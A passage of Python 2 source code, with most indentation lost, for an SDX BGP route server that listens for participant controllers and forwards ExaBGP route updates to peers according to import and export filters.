logger.debug('Sending a route update to participant %d', self.id)
if route:
msg = json.dumps({'bgp': route, 'route_id': route['route_id']})
else:
msg = 'stop'
        self.conn.send(struct.pack('<H', len(msg) + 2) + msg)  # explicit little-endian to match the receiver's parsing
class PctrlListener(object):
def __init__(self):
logger.info("Initializing the BGP PctrlListener")
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener.bind(config.ah_socket)
self.listener.listen(128)
self.run = True
def start(self):
logger.info("Starting the BGP PctrlListener")
while self.run:
try:
self.listener.settimeout(1)
(conn, addr) = self.listener.accept()
pc = PctrlClient(conn, addr)
t = Thread(target=pc.start)
with clientPoolLock:
logger.debug('Trace: PctrlListener.start: clientActivePool before: %s', clientActivePool)
logger.debug('Trace: PctrlListener.start: clientDeadPool before: %s', clientDeadPool)
clientActivePool[pc] = t
# while here, join dead threads.
while clientDeadPool:
clientDeadPool.pop().join()
logger.debug('Trace: PctrlListener.start: clientActivePool after: %s', clientActivePool)
logger.debug('Trace: PctrlListener.start: clientDeadPool after: %s', clientDeadPool)
t.start()
except socket.timeout:
pass
logger.info("listener socket close")
self.listener.close()
def stop(self):
logger.info("Stopping PctrlListener.")
self.run = False
class BGPListener(object):
def __init__(self, as_num):
logger.info('Initializing the BGPListener')
# Initialize XRS Server
self.server = Server(logger)
self.run = True
self.route_id = 0
self.start_time = 0
self.end_time = 0
self.as_num = int(as_num)
self.stop_counts = 0
def start(self):
logger.info("Starting the Server to handle incoming BGP Updates.")
self.server.start()
waiting = 0
while self.run:
# get BGP messages from ExaBGP via stdin in client.py,
# which is routed to server.py via port 6000,
# which is routed to here via receiver_queue.
try:
route = self.server.receiver_queue.get(True, 1)
except Queue.Empty:
if waiting == 0:
logger.debug("Waiting for BGP update...")
waiting = (waiting+1) % 30
continue
if self.start_time == 0:
self.start_time = time.time()
waiting = 0
logger.debug("\n BGPListener: Got original route from ExaBGP: %s\n", route)
route = json.loads(route)
if 'stop' in route:
logger.info("BGPListener: stop signal received from ExaBGP")
peers = participants.values()
for peer in peers:
peer.send([])
continue
self.route_id = route["route_id"]
# Received BGP route advertisement from ExaBGP
try:
advertise_ip = route['neighbor']['ip']
except KeyError:
continue
found = []
with participantsLock:
try:
advertise_id = portip2participant[advertise_ip]
peers_out = participants[advertise_id].peers_out
except KeyError:
continue
for id, peer in participants.iteritems():
# Apply the filtering logic
if id in peers_out and advertise_id in peer.peers_in:
found.append(peer)
for peer in found:
                # Now send this route to the participant's controller
peer.send(route)
self.end_time = time.time()
self.server.stop()
def send(self, announcement):
self.end_time = time.time()
#self.server.sender_queue.put(announcement)
def stop(self):
logger.info("Stopping BGPListener.")
self.run = False
def parse_config(config_file):
"Parse the config file"
# loading config file
logger.debug("Begin parsing config...")
with open(config_file, 'r') as f:
config = json.load(f)
ah_socket = tuple(config["Route Server"]["AH_SOCKET"])
logger.debug("Done parsing config")
return Config(ah_socket)
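# A plausible sdx_global.cfg fragment for parse_config (hypothetical host/port):
#   {"Route Server": {"AH_SOCKET": ["localhost", 6666]}}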
def main():
global bgpListener, pctrlListener, config
parser = argparse.ArgumentParser()
parser.add_argument('as_num', help='the as number')
parser.add_argument('dir', help='the directory of the example')
args = parser.parse_args()
# locate config file
config_file = "../examples/" + args.dir + "sdx_global.cfg"
logger.info("Reading config file %s", config_file)
config = parse_config(config_file)
bgpListener = BGPListener(args.as_num)
bp_thread = Thread(target=bgpListener.start)
bp_thread.start()
pctrlListener = PctrlListener()
pp_thread = Thread(target=pctrlListener.start)
pp_thread.start()
create_sig()
while bp_thread.is_alive():
try:
time.sleep(5)
except KeyboardInterrupt:
bgpListener.stop()
bp_thread.join()
pctrlListener.stop()
pp_thread.join()
logger.info("route server exits.")
if __name__ == '__main__':
main()
|